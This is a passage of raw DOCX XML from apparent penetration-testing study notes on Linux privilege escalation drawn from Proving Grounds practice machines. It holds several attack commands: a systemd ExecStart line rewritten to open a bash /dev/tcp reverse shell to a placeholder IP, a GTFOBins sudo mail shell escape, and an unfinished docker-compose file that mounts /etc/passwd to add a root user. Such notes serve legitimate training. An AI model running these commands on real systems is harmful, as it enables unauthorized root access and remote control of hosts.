    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002007">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One of them (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/systemd/system/spiderbackup.service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) is writable. So we can try editing it </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002008">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2603500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="40" name="image39.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image39.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId688"/>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2009">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="919"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We edit the "ExecStart" line to run a reverse shell instead of what it was doing originally</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000200A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="919"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ExecStart=/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/&lt;your_ip&gt;/&lt;your_port&gt; 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000200B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000200C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then start listener and run the sudo commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000200D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:ind w:left="72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200E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /bin/systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000200F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We ran this to be safe but idk if it was necessary. Probably a good idea though since we were given that sudo priv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002010">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /bin/systemctl restart spiderbackup.service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002011">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002012">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002013">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m7xrn0pphds0" w:id="276"/>
      <w:bookmarkEnd w:id="276"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/mail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002014">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002015">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId689">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Postfish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice they had sudo privs for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/mail *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002016">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1168400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="173" name="image175.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image175.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId690"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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2017">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002018">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And to exploit it, use the exploit from GTFOBins:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1242"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /usr/bin/mail --exec='!/bin/bash'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000201A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000201B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000201C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e3039p6o4jqn" w:id="277"/>
      <w:bookmarkEnd w:id="277"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/docker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000201D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId691">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SkillForce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG practice, they saw this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000201E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/docker compose -f /home/mcsam/app/skillforge-docker/docker-compose.yaml up -d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000201F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In plain english: This command runs Docker Compose (using the Docker binary at /usr/bin/docker), tells it to use the docker-compose.yaml file located at /home/mcsam/app/skillforge-docker/, and starts all the services defined in that file in detached (background) mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-f </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag tells Docker Compose which YAML file to use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002021">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">up</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells Docker Compose to create and start containers based on the services defined in the YAML file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002023">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Short for detached mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002024">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Runs the containers in the background instead of attaching to their logs in your terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002025">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Without -d, the containers’ output would stream directly to your console.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002026">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002027">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To exploit the ability to run docker compose as root, we first verify whether we have write access to the existing Compose file at: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/mcsam/app/skillforge-docker/docker-compose.yaml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002028">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ls -l </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">confirms that mcsam has write permissions to this file. This allows us to replace the contents of the file with a custom Docker Compose configuration that will help us escalate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002029">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000202A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Our goal is to mount the host’s /etc/ directory into a container and append a new user entry to /etc/passwd to gain a root shell. We can edit the docker-compose.yaml file with the following content:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000202B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">version: "3.8"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000202C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000202D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">services:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000202E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  suidbash:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000202F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    image: ubuntu:latest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002030">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    container_name: suid_bash_container</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002031">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002032">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">      - /etc/passwd:/mnt/passwd:rw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002033">
